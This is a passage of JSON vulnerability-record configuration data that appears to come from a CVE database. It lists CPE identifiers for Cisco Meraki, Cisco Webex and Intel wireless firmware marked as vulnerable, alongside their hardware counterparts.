                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr53:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr53e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr53e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr55_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr55:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr56_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr56:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr62_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr62:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr66_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr66:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr72_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr72:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr74_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr74:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr76_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr76:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr84_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr84:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr86_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr86:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx64w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx64w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx65w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx65w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx67cw_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx67cw:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx67w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx67w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx68cw_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx68cw:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx68w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx68w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_z3_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_z3:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_z3c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_z3c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_55_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_55:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_55s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_55s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_70s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_70s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_85s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_85s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_dx70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_dx70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_dx80_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_dx80:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_55_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_55:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_55_dual_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_55_dual:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_dual_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_dual:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_dual_g2_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_dual_g2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_single_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_single:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_single_g2_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_single_g2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_kit_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_kit:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_kit_mini_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_kit_mini:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_8260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_8260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_8265_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_8265:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_9260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_9260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_9560_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_9560:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:killer_ac_1550_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:killer_ac_1550:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:killer_wi-fi_6_ax1650_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:killer_wi-fi_6_ax1650:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:killer_wi-fi_6e_ax1675_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:killer_wi-fi_6e_ax1675:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_3165_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_3165:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_3168_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_3168:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_8260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_8260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_8265_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_8265:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9461_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9461:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9462_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9462:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9560_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9560:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wi-fi_6_ax200_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wi-fi_6_ax200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wi-fi_6_ax201_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wi-fi_6_ax201:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wi-fi_6e_ax210_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wi-fi_6e_ax210:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
